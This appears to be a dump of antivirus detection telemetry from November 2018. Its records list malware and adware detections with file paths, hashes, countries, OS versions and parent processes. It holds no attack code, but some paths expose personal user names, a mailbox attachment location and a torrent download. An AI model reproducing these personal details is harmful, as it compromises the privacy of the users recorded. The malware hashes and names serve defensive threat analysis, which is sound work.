  Row(detection=Row(filename='ultra xvid codeck pack.exe', filepath='F:\\download\\movie_65923_1080p_mpeg2\\Ultra XVid Codeck Pack.exe', filesize=512000, name='TR/Kryptik.vxbnq.#M1.#R1'), hash='6aebe3252c7ac6a5ebaf908c8e0ffeaa0b0e72759f8b7bedb1f90a4c1b4c1375', metadata=Row(cmdline='\\\\\\"magnet:?xt=urn:btih:995a482f481811d96f1755c66fc242f195b8b214&dn=[%EB%AC%B4%EC%82%AD%EC%A0%9C]%20%EC%97%90%EB%A1%9C%20%EC%98%81%ED%99%94%20%EC%97%91%EA%B8%B0%EC%8A%A4%20[%EB%85%B8%EC%BB%B7-%EB%85%B8NG]%20%EB%AA%A8%EC%9D%8C(1%ED%83%84).mp4&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969&tr=udp%3A%2F%2Feddie4.nl%3A6969&tr=udp%3A%2F%2Ftracker.pirateparty.gr%3A6969&tr=udp%3A%2F%2Fopentrackr.org%3A1337&tr=udp%3A%2F%2Ftracker.zer0day.to%3A1337\\\\\\"', country='KR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='F:\\qBittorrent\\qbittorrent.exe', parentsize=24981504, timestamp='2018-11-04T11:53:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-075419-88f83a86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_24dc9eb5\\AVSCAN-20181104-074808-392E2EED\\AVSCAN-20181104-075419-88F83A86', filesize=1024000, name='Adware/CsdiMonetize.ajkoe.#M1.#R1'), hash='27ed231f47ab2f749185418f33ea7c237230d8c3a1b98ccdbcd1d008af125c21', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T00:54:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='145___07.exe', filepath='d:\\كاميرا\\145___07\\145___07.exe', filesize=11264000, name='W32/Sality.AT.#M1.#R1'), hash='b9409d8e1b382236ea21942e235f81e32c22d45c0c136872420d9cba90f239d8', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:55:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0008ff30', filepath='C:\\Windows\\Temp\\tmp00000336\\tmp0008ff30', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-04T11:06:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-231910-681cdb4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_89e497ab\\AVSCAN-20181103-230631-1EB43BCA\\AVSCAN-20181103-231910-681CDB4B', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:42:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='MM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:10:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-113356-15b5dc4f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0255a3\\AVSCAN-20181104-112225-BD1A616D\\AVSCAN-20181104-113356-15B5DC4F', filesize=320000, name='PUA/DownloadSponsor.Gen.#M1.#R1'), hash='c3cd658e9d163ab548f9d2e37cd03d997069d146755a45283b48b9b3e07bd6e9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:33:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:21:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autopatch.exe', filepath='\\\\?\\C:\\Program Files\\Gamania\\GamaniaSafe\\AutoPatch.exe', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='d56c4ac37710b87ffb319a706ec10b950f7ce93c665dfb216a63ba9cdf62073e', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T01:21:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-214231-ea119df5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c3c616b9\\AVSCAN-20181103-213540-C6435A66\\AVSCAN-20181103-214231-EA119DF5', filesize=576000, name='TR/Agent.2d9bff.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:42:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T10:29:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-055551-48d4d377', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01dbbab1\\AVSCAN-20181105-054924-2355A1B0\\AVSCAN-20181105-055551-48D4D377', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T21:55:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-045555-2e224c60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-045101-EF83A9A5\\AVSCAN-20181104-045555-2E224C60', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T03:55:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-103055-192d4bd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_82c47796\\AVSCAN-20181104-102934-0C7BA5F0\\AVSCAN-20181104-103055-192D4BD0', filesize=4448000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='1575f3c31ed0d3882399cdf5a4581893bd9797d09d6d0f0c55a9d16d2ca44c96', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T09:31:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ahcremind.exe', filepath='C:\\Program Files\\Adobe\\Adobe Help Center\\ahcremind.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='8f7f27476ea1e5821a30c00a349d26bf38ff5d65cfbaa1cf62eb2af0b5e34ec9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-04T05:49:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0182650.exe', filepath='d:\\system volume information\\_restore{a0838581-84a6-4d91-8040-c33e0d667479}\\rp104\\A0182650.exe', filesize=256000, name='SPR/PowerReg.b1c843.#M1.#R1'), hash='b1c84398ff562cf2028555d8d497a372dc65e0739a8ec7b771608fd2667199c5', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T04:17:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ismael.exe', filepath='D:\\ISMAEL.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='5f9c58fa91578780ab3658e472f25933a098ca5641aea2e383cba2d91d3c30d7', metadata=Row(cmdline='rtp', country='BF', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-04T23:16:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T21:01:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180133-73086671', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2977c28d\\AVSCAN-20181104-155018-84E92D58\\AVSCAN-20181104-180133-73086671', filesize=76000, name='TR/Rogue.1499327.#M1.#R1'), hash='44cabd82e43fe98c0db76239c17febfff2a361554bea3634f9124c4d3142cebc', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:01:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='aby.exe', filepath='c:\\users\\X\\downloads\\aby.exe', filesize=592000, name='TR/Dropper.VB.ae763b.#M1.#R1'), hash='ae763b30e093a8684f1248c183ba4c45d24f9a14728ec475229ed55f974cfdd2', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3894968, timestamp='2018-11-04T08:32:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-152403-7eaa311f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4e1885d5\\AVSCAN-20181104-152342-7C973FFC\\AVSCAN-20181104-152403-7EAA311F', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T14:24:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dyne repair utility.exe', filepath='D:\\Dyne1\\DYNECC\\Dyne Repair Utility.exe', filesize=96000, name='TR/Patched.Ren.Gen.#M300.#R3807'), hash='2e26e33a68c31f79c353990911a4d18e9d1626ec0d135aeb1746636bcddad6e4', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='OM', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T10:38:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-194026-8cced7fb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cad85403\\AVSCAN-20181104-193303-4F088A0E\\AVSCAN-20181104-194026-8CCED7FB', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='6d381533e89cbe6e42550aaf5fc035cd536fc6f116cb57a6fe7ea7b5499aba9d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:40:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090745-122d4a25', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db8dd2eb\\AVSCAN-20181104-090024-C0286FC2\\AVSCAN-20181104-090745-122D4A25', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:07:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b4adff32e47d26ace2af6e75c71f08fc.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_819625890\\b4adff32e47d26ace2af6e75c71f08fc.smp', filesize=192000, name='HEUR/AGEN.1004975.#M1.#R1'), hash='6d7536011c77198025a433867e02cbee2d96886969f5386ff3d354a3989fbe52', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-04T20:36:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T18:57:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='qipapp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\QIPApp\\QIPApp.exe', filesize=320000, name='HEUR/AGEN.1004090.#M1.#R1'), hash='a9b9b83dae89b09e76c096c14e92449a08ab737fa20012f681990a159f6aa306', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:51:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vbe6.dll', filepath='D:\\AutoCAD2009\\x86\\support\\VBA\\pFiles\\Common\\MSShared\\Vba\\Vba6\\vbe6.dll', filesize=2560000, name='W32/Ramnit.A.#M1.#R1'), hash='f63062e6ae4503f8bc696fd0b759d0763f5f032bf5335dbd265c92907a0459a4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:05:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='em000_32.dll', filepath='D:\\Archivos de programa\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083109-b50772f8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-082729-98D810FE\\AVSCAN-20181102-083109-B50772F8', filesize=64000, name='TR/Siggen.64000.1.#M1.#R1'), hash='bff6eb442a00089abb08a519e3dc447241e8a0d37685002cf8a6c6f62e9fc6a1', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='15040bii3646501.doc', filepath='/Users/florence/Library/Mail/V6/D461968A-2AAE-48AE-AC7E-ED8EC66B7F79/[Gmail].mbox/All Mail.mbox/8A54D6F7-8305-4C4E-A0D2-02468F9A29A0/Data/5/Attachments/5961/2/15040BII3646501.doc', filesize=64000, name='HEUR/Macro.Downloader.#M5.#R1007'), hash='d1f6e364ef6552ab5a1db415c12743d74cd0ee41b799ec696e615163532931cb', metadata=Row(cmdline=None, country='GB', os_name='MacOS', os_vmajor='18', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T12:28:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mapdrive.exe', filepath='E:\\HBCD\\Programs\\MapDrive.exe', filesize=64000, name='TR/Agent.64000.23.#M1.#R1'), hash='761b1923e551a80eff514946add04f60da41d61100452d30ba6f76d5ebb76cbe', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:10:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\Crack\\Crack.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e41b2c6c7ef4e6b36ce172589c39ef92ce0c73b6bf4b0e29a72be285a2f0ef42', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ue32.exe', filepath='F:\\Software\\Norton AntiVirus\\AdvTools\\UE32.EXE', filesize=512000, name='W32/Sality.Patched.#M1.#R1'), hash='9e94ec0106058c1fb2a512bd31e5cd25730dbb93dae4bdba4d2a32bdbb2bf5d2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-02T06:00:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-095320-97020fd0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1794abbb\\AVSCAN-20181102-094524-5A2AC9D9\\AVSCAN-20181102-095320-97020FD0', filesize=5444000, name='PUA/Systweak.#M1.#R1'), hash='c8f28ea521eb29b88e8279c4e7b5df617cf50c64764bde1a443883b3a13046be', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T08:53:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='watermark.exe', filepath='C:\\program files\\microsoft\\watermark.exe', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='76713ebad8aaccef88cbe580ef0b1dc9c258ff0a21b4eb6680217469f0d1da33', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:32:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-134515-d43ef710', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-123256-410908D6\\AVSCAN-20181102-134515-D43EF710', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T05:44:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lightmaps.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL1\\lightmaps\\lightmaps.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='b4c443611f34d5e6385e54844cfdcf231e19804ecbaf809ba370391c5070bbf7', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='miner.exe', filepath='E:\\White Backup\\Desktop\\Zcash Miner\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T02:41:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='safenavi64.dll', filepath='\\\\?\\C:\\Program Files (x86)\\MPC Cleaner\\SafeNavi64.dll', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='f0507c1b579da388341b7527f761a402b82fd12c078265390a51ddcf1e704edc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T21:58:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xnbutjnh.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\XNbutJNH.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:01:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2012整村脱贫村附表1-4.xls', filepath='F:\\工作\\梅江资料\\农服中心\\2\\2012整村脱贫村附表1-4.xls', filesize=128000, name='HEUR/Macro.Downloader.ZAP.Gen.#M1.#R1'), hash='d3387d5a7b5f13c38a674d8992fdad8d996b35ba6a138af9fe2a4c94d18aa8c8', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T14:17:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='nmworker.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\.micro_miner\\resources\\nvidia\\18\\nmworker.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/minimized', country='PA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Micro Miner\\MicroMiner.exe', parentsize=578048, timestamp='2018-11-02T13:14:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110841-cde947be', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6ecee166\\AVSCAN-20181102-110735-C33353C8\\AVSCAN-20181102-110841-CDE947BE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2ivrhy0ko2l\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='PT', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=48640, timestamp='2018-11-02T09:00:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181428-62fc9557', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0dde6b91\\AVSCAN-20181102-175827-0F3232B0\\AVSCAN-20181102-181428-62FC9557', filesize=1280000, name='TR/Agent.anqai.#M1.#R1'), hash='bd25952768b6332da9a97a9234b8abe029fac840c7a5f025a8fc3937f543386b', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tvwsetup.exe', filepath='E:\\intel3x4x\\VGA\\vista32\\Graphics\\TVWSetup.exe', filesize=8192000, name='TR/Patched.Ren.Gen3.#M300.#R200082'), hash='ee1db5ed9840596dcd56cba8e2d7884af1a5e1e70e02992d45b83813a08de488', metadata=Row(cmdline='-r', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security 10 for Windows\\avp.exe', parentsize=729744, timestamp='2018-11-02T12:34:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rarrepairtool.exe', filepath='E:\\HBCD\\Programs\\RarRepairTool.exe', filesize=64000, name='TR/Siggen.64000.7.#M1.#R1'), hash='c030b37c4066998c7686b51d6cd8690308eeeadbec7712a6ae6190b18fd40916', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:21:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-081219-249cdb08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_78554da8\\AVSCAN-20181102-081049-1917AE4E\\AVSCAN-20181102-081219-249CDB08', filesize=64000, name='TR/Siggen.64000.8.#M1.#R1'), hash='928970136fecc731176bb438d4e172a4564f71cc3e402b006f5210c251f1a380', metadata=Row(cmdline=None, country='MT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:12:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\juj1bjzepjw\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:35:15Z'), dt=datetime.date(2018, 11, 2)),
